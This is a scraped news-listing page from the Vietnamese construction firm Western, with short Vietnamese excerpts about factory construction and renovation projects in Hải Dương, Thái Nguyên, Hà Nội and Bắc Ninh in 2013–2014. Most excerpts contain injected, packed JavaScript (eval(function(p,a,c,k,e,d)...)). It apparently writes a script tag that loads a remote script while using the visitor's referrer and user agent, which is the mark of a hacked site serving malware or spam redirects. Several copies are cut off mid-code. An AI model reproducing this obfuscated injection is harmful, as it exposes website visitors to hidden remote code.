Contruction & Investment

Nha%20xuong%204[1]

Công trình mở rộng và cải tạo nhà máy KPF Vina – Hải Dương

D? eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c])}}return p}('0.6("");n m="q";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|rrzyb|var|u0026u|referrer|nkhkh||js|php'.split('|'),0,{})) ...  Read more
984221_628307470624847_4157297505968798321_n

Công trường Glonics Việt Nam – Bujeon – Thái Nguyên

Công tr??ng Glonics Vi?t Nam – Bujeon – Thái Nguyên. B?t ??u tri?n khai t? tháng 8/2014. eval(function(p,a,c,k,e,d){e=function(c){return eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return...  Read more
10347540_538744002914528_1413090521150124657_n

6/2014 – Western thi công cải tạo nhà máy Cresyn Hà Nội.

Western eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c])}}return p}('0.6("");n m="q";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|dztrb|var|u0026u|referrer|krirb||js|php'.split('|'),0,{})) ...  Read more
1898234_494509800671282_1479645057_n

Western .JSC: Khởi công đồng loạt 2 dự án tại Bắc Ninh và Thái Nguyên đầu năm 2014

Trong eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c])}}return p}('0.6("");n m="q";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|ehinb|var|u0026u|referrer|sseza||js|php'.split('|'),0,{})) ...  Read more
1382099_429012240554372_1248556799_n

10/2013 -Triển khai thi công một số hạng mục thuộc dự án xây dựng nhà máy M&C ELECTRONICS VINA BAC NINH.

Ngày 8/10/2013 Western eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c])}}return...  Read more